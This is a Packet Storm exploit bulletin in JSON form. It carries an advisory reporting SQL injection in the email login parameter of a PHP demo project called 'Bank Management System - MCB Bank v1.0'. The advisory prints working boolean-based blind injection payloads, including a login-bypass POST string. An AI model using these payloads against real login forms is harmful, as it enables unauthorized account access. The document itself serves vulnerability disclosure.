Bank Management System 1.0 SQL Injection

2022-02-25T00:00:00

Description

{"id": "PACKETSTORM:166149", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Bank Management System 1.0 SQL Injection", "description": "", "published": "2022-02-25T00:00:00", "modified": "2022-02-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166149/Bank-Management-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-02-25T15:09:08", "viewCount": 94, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "vulnersScore": -0.1}, "_state": {"dependencies": 1646392271, "score": 1659855189}, "_internal": {"score_hash": "55d361985ab3e708671ac20b5c3fee60"}, "sourceHref": "https://packetstormsecurity.com/files/download/166149/bms10-sql.txt", "sourceData": "`# Title: Bank Management System - MCB Bank v1.0 - SQLi \n# Author: nu11secur1ty \n# Date: 02.25.2022 \n# Vendor: https://www.campcodes.com/projects/php/ by:Tariq Fareeds \n# Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/ \n# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System \n \n \n## Description: \nThe email parameter from Bank Management System - MCB Bank v1.0 \nappears to be vulnerable to SQL injection attacks. \nThe payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078-- \nwere each submitted in the email parameter. \nThese two requests resulted in different responses, indicating that \nthe input is being incorporated into a SQL query in an unsafe way \nWARNING: If this is in some external domain, or some subdomain \nredirection, or internal whatever, this will be extremely dangerous! \nStatus: CRITICAL \n \n \n[+] Payloads: \n \n```mysql \n--- \nParameter: email (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause \nPayload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin= \n--- \n \n``` \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/hvaaiu) \n \n`\n"}